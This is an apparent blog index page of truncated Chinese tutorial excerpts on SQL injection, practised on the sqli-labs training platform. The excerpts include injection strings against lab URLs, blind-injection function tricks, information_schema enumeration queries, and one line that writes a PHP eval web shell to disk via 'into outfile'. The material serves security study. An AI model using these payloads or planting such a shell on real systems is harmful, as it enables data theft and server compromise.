知识点: 1.left函数,left(a,b)从左侧截取a的前b位,正确则返回1,错误则返回0。 2.regexp函数,例如:select user()regexp ‘r’;user的结果是root,regexp为匹配root的正则表达式。 3.like函数,例如:select user()like ...
分类:
数据库 时间:
2020-02-04 15:57:51
阅读次数:
99
一、首先测试显示内容 例:http://localhost/sqli-labs-master/Less-5/?id=1 http://localhost/sqli-labs-master/Less-5/?id=2 显示内容相同 http://localhost/sqli-labs-master/Le ...
分类:
数据库 时间:
2020-02-04 14:01:39
阅读次数:
69
less 54 ?id=1 http://192.168.50.100/sqli-labs/Less-54?id=1' order by 3 --+ 正常 http://192.168.50.100/sqli-labs/Less-54?id=1' order by 4 --+ 不正常 ?id=0' ...
分类:
数据库 时间:
2020-02-04 00:29:07
阅读次数:
121
lines terminated by xxx 以xxx为结尾:select '<?php @eval($_ POST[crow]);?>' into outfile 'C:\pbpstudy\PHPTutorilWWW.crow.pbp’ linesterminated by 0x363636;最 ...
分类:
数据库 时间:
2020-02-03 22:49:41
阅读次数:
110
1)、前期准备、知识点 开始之前,为了方便查看sql注入语句,我在sqli-labs-master网页源码php部分加了两行代码,第一行意思是输出数据库语句,第二行是换行符 一、Mysql 登录 1、明文密码 在bin目录下 输入:mysql -u 账户 -p 密码 2、**密码 在bin目录下 输 ...
分类:
数据库 时间:
2020-02-03 17:33:39
阅读次数:
141
一、SQLi-Labs是什么? SQLi-Labs是一个专业的SQL注入练习平台,适用于GET和POST场景,包含了以下注入: 1、基于错误的注入(Union Select) 字符串 整数 2、基于误差的注入(双查询注入) 3、盲注入(01、基于Boolian数据类型注入, 02、基于时间注入) 4 ...
分类:
数据库 时间:
2020-02-03 09:59:17
阅读次数:
90
Mysql 登录 1、明文密码 在bin目录下 输入:mysql -u 账户 -p 密码 2、**密码 在bin目录下 输入:mysql -u 账户 -p 后回车再输入密码 --+ -- # 都是SQL语句的注释符 ,sql语句运行到此结束。 and or : A and B A,B都Ture 结果 ...
分类:
数据库 时间:
2020-02-02 15:46:46
阅读次数:
94
我们在学习这项内容之前,需要安装两样应用程序,下载路径的搜索比较麻烦,这里提供两个已知的百度网盘网址及其提取码以供使用: 1.安装phpstudy; 链接:https://pan.baidu.com/s/1yeOLf7Mty5bEGLPUSodILg 提取码:y3vl 2.安装sqli-labs-m ...
分类:
数据库 时间:
2020-02-01 15:59:56
阅读次数:
101
mysql的基本用法: 查库:select schema_name from information_schema.schemata 等同于 show databases 查表:select table_name from information_schema.tables where table_ ...
分类:
数据库 时间:
2020-01-31 15:55:44
阅读次数:
116
开始之前先分享一点基础知识。 常用系统函数 version()——MySQL 版本 user()——数据库用户名 database()——数据库名 @@datadir——数据库路径 @@version_compile_os——操作系统版本 字符串连接函数 concat(str1,str2,…)——没 ...
分类:
数据库 时间:
2020-01-30 18:56:26
阅读次数:
109
